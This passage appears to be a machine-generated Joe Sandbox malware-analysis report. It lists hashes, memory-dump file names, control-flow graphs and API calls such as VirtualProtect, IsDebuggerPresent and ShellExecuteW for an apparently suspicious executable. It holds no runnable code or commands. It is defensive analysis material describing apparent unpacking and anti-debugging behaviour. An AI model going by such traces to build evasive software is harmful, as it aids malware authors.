                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca233409adb7bce15e3128068cd7ca505cbfc117fdafb553173fcfee44554721
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A516E31A08B4C8FDF98EB98D859BEDBBF1EF55310F00416AD01ED72A2DA719985CB41
                                                                                                                                                                                                                                                                                    Function 00007FFD9B7E33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2285175224.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                                                    • Instruction ID: 347eb46863d0610c54c5e9c05e70889870b2352b4ba84a369cc0dc72dc0b729b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D01A73020CB0C4FD748EF0CE051AA5B3E0FF85320F10056DE58AC36A1DA32E882CB41

                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                    Execution Coverage:0.3%
                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                    Signature Coverage:7%
                                                                                                                                                                                                                                                                                    Total number of Nodes:171
                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:3
                                                                                                                                                                                                                                                                                    execution_graph 32932 404840 9 API calls _com_util::ConvertStringToBSTR 32933 402c40 SendMessageW SendMessageW SendMessageW 32981 401140 GdipCloneImage GdipAlloc 33025 40f240 GetWindowRect 33063 40f340 RedrawWindow 32934 411040 25 API calls 32935 418440 StrFormatByteSizeW EnterCriticalSection 33064 461b40 ReadFile __aullrem 32937 474040 GetProcessHeap HeapFree 32900 43954b 32901 439c49 32900->32901 32902 439c6b VirtualProtect 32901->32902 32903 439ca8 32902->32903 33027 40fe4e 9 API calls _com_util::ConvertStringToBSTR 32938 410450 11 API calls 32984 417550 8 API calls 32985 414d50 DrawTextExW 32939 425050 21 API calls 32940 424850 14 API calls 32941 42c850 SendMessageW GetClientRect SendMessageW GetClientRect 33066 466750 52 API calls 33067 401b5a 35 API calls 33068 403f60 EnableWindow 32943 41ec60 19 API calls 32944 420c60 18 API calls 33029 424660 29 API calls 33030 467260 _TrackMouseEvent ReleaseCapture SendMessageW 33071 46cb60 12 API calls 32945 402070 61 API calls 33073 40ff70 SendMessageW RedrawWindow 32887 41ae70 32890 41aeba 32887->32890 32888 41b0b4 32895 451080 32888->32895 32890->32888 32892 41af24 32890->32892 32899 41ac10 GetModuleFileNameW 32892->32899 32894 41af40 32894->32888 32896 45108c ExitProcess 32895->32896 32897 45109b 32895->32897 32899->32894 33031 418a70 21 API calls 32946 42e870 GetClientRect PtInRect RedrawWindow 32987 455970 EnterCriticalSection ExitProcess ExitProcess 32988 401100 GdipDisposeImage GdipFree 32989 40e900 CloseThemeData 32947 416400 GetWindowRect InflateRect GetParent GetParent InvalidateRect 33032 414e00 PtVisible 33075 415700 SendMessageW 33076 417f00 14 API calls 32948 425c00 40 API calls 33033 427a00 EnterCriticalSection GetActiveWindow MessageBoxW GetActiveWindow MessageBoxW 33078 423f00 115 API calls 33079 451f00 VariantClear SysAllocString VariantClear VariantClear 32991 461900 19 API calls _com_util::ConvertStringToBSTR 33080 462f00 17 API calls 33081 406310 8 API calls 32950 410010 TrackMouseEvent 32992 414d10 GrayStringW 33034 418a10 GetParent GetParent SendMessageW 33082 414f10 RectVisible 33083 42ef10 SendMessageW SendMessageW SendMessageW SendMessageW SendMessageW 32994 431d10 17 API calls 32995 45a110 DeviceIoControl GetLastError 32996 452910 SysFreeString SysFreeString SysAllocString 33084 45fb10 13 API calls 2 library calls 32951 46cc10 10 API calls 32952 406020 6 API calls 32953 402020 SendMessageW SendMessageW 33035 406a20 11 API calls 33085 401320 6 API calls 33036 415620 TextOutW 33037 410a20 30 API calls 33038 41fa20 GetMenuItemCount GetMenuItemID 32954 423c20 99 API calls 32955 424c20 11 API calls 33039 427220 28 API calls _com_util::ConvertStringToBSTR 33040 453220 11 API calls 32904 44f92b 32910 44f948 32904->32910 32905 44f98f VirtualProtect 32907 44fcbe 32905->32907 32913 44fd38 32907->32913 32928 44fd24 ExitProcess ExitProcess 32907->32928 32910->32905 32917 44fbc9 32910->32917 32916 450f9c 32913->32916 32929 450805 ExitProcess ExitProcess 32913->32929 32918 44fbee VirtualProtect 32917->32918 32920 44fcbe 32918->32920 32924 44fd38 32920->32924 32930 44fd24 ExitProcess ExitProcess 32920->32930 32927 450f9c 32924->32927 32931 450805 ExitProcess ExitProcess 32924->32931 32997 40f130 GetDC SendMessageW GetClientRect ReleaseDC 32998 401130 GdipDeleteGraphics 32999 406d30 SetRectEmpty CopyRect 33042 407230 11 API calls 33000 410930 19 API calls 33089 41a730 CreateMutexW GetLastError 33090 414f30 BitBlt 33091 42e730 7 API calls 33092 46bf30 GetClientRect BeginDeferWindowPos EndDeferWindowPos RedrawWindow 32956 473c39 DeleteDC 32957 40e8c0 OpenThemeData 33043 401ec0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33044 402ec0 SendMessageW 33093 40f3c0 6 API calls _com_util::ConvertStringToBSTR 33094 406bc0 10 API calls 33095 415fc0 27 API calls 32958 46c8c0 14 API calls 33003 46adc0 6 API calls 33097 4657c0 22 API calls 32959 40f0d0 DrawThemeBackground 33047 403ed0 GetModuleHandleW LoadLibraryW GetProcAddress GetLastError SetLastError 32960 4114d0 ShellExecuteW 32961 41f8d0 11 API calls _com_util::ConvertStringToBSTR 33005 414dd0 ExtTextOutW 33048 4162d0 19 API calls 33006 42d9d0 48 API calls 32962 4734dc 5 API calls ___security_init_cookie 32963 402ce0 SendMessageW SendMessageW SendMessageW 32964 4168e0 24 API calls _com_util::ConvertStringToBSTR 32965 414ce0 Escape 33100 41a7e0 31 API calls 33049 42fae0 StrFormatByteSizeW 33050 467ae0 ScreenToClient PtInRect PtInRect 32966 40ecf0 15 API calls 33007 4011f0 EnterCriticalSection GdiplusShutdown LeaveCriticalSection 33008 4081f0 CopyRect 32967 419cf0 6 API calls 32968 4254f0 20 API calls 33010 42c9f0 8 API calls 33011 42fdf0 23 API calls 33012 40f5f9 13 API calls 33013 402980 11 API calls 33052 40f280 GetClientRect PtInRect GetClientRect PtInRect _TrackMouseEvent 33102 401380 DeleteObject 33103 40e780 6 API calls 33014 418180 11 API calls 33016 414d80 TabbedTextOutW 33104 416b80 9 API calls 32969 423480 GetSubMenu GetCursorPos SetForegroundWindow IsWindow SetForegroundWindow 33053 427e80 83 API calls 33017 432180 SendMessageW SendMessageW SendMessageW SendMessageW 32970 451c80 12 API calls 33105 40f790 23 API calls _com_util::ConvertStringToBSTR 32972 418090 GetClientRect 32973 415890 28 API calls 33107 410390 21 API calls 33108 419f90 GetPropW 32974 422890 LoadMenuW GetSubMenu GetCursorPos 33054 425a90 95 API calls 33109 420b90 8 API calls 33020 452190 15 API calls 32975 467490 12 API calls 33021 467190 40 API calls 32977 436894 8 API calls 32978 40fca0 21 API calls _com_util::ConvertStringToBSTR 33110 405fa0 15 API calls 33112 4163a0 6 API calls 33113 414fa0 CreateCompatibleDC CreateCompatibleDC 33023 4251a0 99 API calls 33055 4222a0 32 API calls 33057 4216a0 138 API calls 33114 4537a0 13 API calls 33024 46b1a0 IsWindowVisible 33115 4673a0 GetWindowRect PtInRect RedrawWindow 33116 404bb0 SetRectEmpty GetTextMetricsW 33059 4156b0 DrawTextW 33060 41fab0 7 API calls 33117 41abb0 GetDC SendMessageW GetTextExtentPoint32W ReleaseDC 32980 4258b0 ExitProcess ExitProcess 33061 4112b7 11 API calls _com_util::ConvertStringToBSTR

                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                    Function 0044F92B Relevance: 1.9, APIs: 1, Instructions: 430memoryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c1b97181995b5b873ef6c82a174a1881c8664ab46c72109f017296002eab23a4
                                                                                                                                                                                                                                                                                    • Instruction ID: 32ec1135f72467027d19faaf1e89592854ee1bb49cbce978dd1a75d24d84a3ca
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1b97181995b5b873ef6c82a174a1881c8664ab46c72109f017296002eab23a4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9702E0B0D041588BFB24CB24CC54BEABBB5EB51304F0481EAD44D67282DA795FC9CF66
                                                                                                                                                                                                                                                                                    Function 0044EFA9 Relevance: 1.9, APIs: 1, Instructions: 422memoryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 128 44efa9-44efb6 129 44efd0-44efe0 128->129 130 44efb8-44efce 128->130 132 44efe6-44eff9 129->132 133 44eeef-44efa8 call 44efa9 129->133 131 44f033-44f03a 130->131 135 44f07c-44f0c8 131->135 136 44f03c-44f07a 131->136 132->133 137 44efff-44f00f 132->137 140 44f0da 135->140 141 44f0ca-44f0d4 135->141 139 44f0e4-44f11d 136->139 142 44f011-44f01b 137->142 143 44f01d 137->143 146 44f160-44f1be call 44f179 139->146 147 44f11f-44fcbc VirtualProtect 139->147 140->139 141->140 148 44ee90-44eead call 44eeb0 141->148 144 44f027-44f02d 142->144 143->144 144->131 159 44f1c0-44f1cc 146->159 160 44f1d1-44f1e6 146->160 157 44fcfc-44fd02 147->157 158 44fcbe-44fcfa 147->158 148->139 161 44fd08-44fd0f 157->161 158->161 162 44f4c2-44f4c9 159->162 163 44f1e8-44f1f4 160->163 164 44f1f9-44f218 160->164 165 44fd11-44fd43 call 44fd24 call 44fd3f 161->165 166 44fd48-44feec call 44feed 161->166 170 44f59d-44f5a8 call 44f5ab 162->170 171 44f4cf-44f4e3 call 44f4e4 162->171 163->162 168 44f21a-44f226 164->168 169 44f22b-44f23d 164->169 188 450291-45068a call 45036d call 450673 165->188 166->188 168->162 174 44f250-44f2b9 169->174 175 44f23f-44f24b 169->175 171->170 185 44f4b6-44f4bc 174->185 186 44f2bf-44f309 174->186 175->162 185->162 189 44f31a-44f32b 186->189 214 450690-450804 call 450805 188->214 215 450f9c-4510ac call 450fac call 450fc2 call 4510bb 188->215 192 44f331-44f341 189->192 193 44f3cc-44f3ec call 44f3ee 189->193 192->193 197 44f347-44f398 call 44f366 192->197 193->185 207 44f3be 197->207 208 44f39a-44f3bc 197->208 207->189 208->207 211 44f3c5 208->211 211->193
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: faddcc2d970d42f849a0a2fff6793f716e50b79d1e25d1082c8f04408cb994ac
                                                                                                                                                                                                                                                                                    • Instruction ID: a1e62c07b9328105f4749d86f6e54d627f67d8c919ce3bf7fc6f258ad57a79d4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: faddcc2d970d42f849a0a2fff6793f716e50b79d1e25d1082c8f04408cb994ac
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48F103B1D041698AF7248B25CC44BEA7AB5EF51304F0480FAD84D67281D67D5FCACF66
                                                                                                                                                                                                                                                                                    Function 00438BE1 Relevance: 1.8, APIs: 1, Instructions: 322COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 232 438be1-438c0b 233 438c1d-438c20 232->233 234 438c0d-438c17 232->234 238 438c27-438c60 233->238 234->233 235 4389e8-438a6d call 438a72 234->235 235->238 239 438c66-438d2c call 438d2d 238->239 240 43955e-439ca6 call 4395e6 call 4398ff call 439918 call 439c6b VirtualProtect 238->240 268 439ca8-439ce6 240->268 269 439cee-439d40 call 439d41 240->269 268->269
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: fe847013d1d4759e7af2f403e4aff0b5d11dee58bb02051e9359444303efbe60
                                                                                                                                                                                                                                                                                    • Instruction ID: 0497523d0196481c722b770e85ac41abb136698388dd891311d3e2aa80c44b90
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe847013d1d4759e7af2f403e4aff0b5d11dee58bb02051e9359444303efbe60
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2C103B2D056199BF7208B24DC50BEBB775EF94310F1451FAE44DA7380EA390EC28B56
                                                                                                                                                                                                                                                                                    Function 0044EE47 Relevance: 1.8, APIs: 1, Instructions: 265memoryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 275 44ee47-44ee73 277 44ee84-44eead call 44eeb0 275->277 278 44ee75-44ee7f 275->278 279 44f0e4-44f11d 277->279 278->279 282 44f160-44f1be call 44f179 279->282 283 44f11f-44fcbc VirtualProtect 279->283 292 44f1c0-44f1cc 282->292 293 44f1d1-44f1e6 282->293 290 44fcfc-44fd02 283->290 291 44fcbe-44fcfa 283->291 294 44fd08-44fd0f 290->294 291->294 295 44f4c2-44f4c9 292->295 296 44f1e8-44f1f4 293->296 297 44f1f9-44f218 293->297 298 44fd11-44fd43 call 44fd24 call 44fd3f 294->298 299 44fd48-44feec call 44feed 294->299 303 44f59d-44f5a8 call 44f5ab 295->303 304 44f4cf-44f4e3 call 44f4e4 295->304 296->295 301 44f21a-44f226 297->301 302 44f22b-44f23d 297->302 321 450291-45068a call 45036d call 450673 298->321 299->321 301->295 307 44f250-44f2b9 302->307 308 44f23f-44f24b 302->308 304->303 318 44f4b6-44f4bc 307->318 319 44f2bf-44f309 307->319 308->295 318->295 322 44f31a-44f32b 319->322 347 450690-450804 call 450805 321->347 348 450f9c-4510ac call 450fac call 450fc2 call 4510bb 321->348 325 44f331-44f341 322->325 326 44f3cc-44f3ec call 44f3ee 322->326 325->326 330 44f347-44f398 call 44f366 325->330 326->318 340 44f3be 330->340 341 44f39a-44f3bc 330->341 340->322 341->340 344 44f3c5 341->344 344->326
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e2df1873d63fa1a06318112b14a010a9538ef87cf4fe15887921df63ce8a161f
                                                                                                                                                                                                                                                                                    • Instruction ID: 064f8fa3836340fe4a09f9ed83cbfec0a462ef6d0ccae8b76755501b7c72da8a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2df1873d63fa1a06318112b14a010a9538ef87cf4fe15887921df63ce8a161f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7A126A1D082988AF7248624DC44BEB7AB5EF51304F0480FED94D57282DA7E5FC9CF66
                                                                                                                                                                                                                                                                                    Function 00439110 Relevance: 1.8, APIs: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 365 439110-43948a call 43913c 371 439490-43951b 365->371 372 43955e-439c43 call 4395e6 call 4398ff call 439918 365->372 371->372 386 43951d-439559 call 43954b 371->386 393 439c49-439ca6 call 439c6b VirtualProtect 372->393 386->393 401 439ca8-439ce6 393->401 402 439cee-439d40 call 439d41 393->402 401->402
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
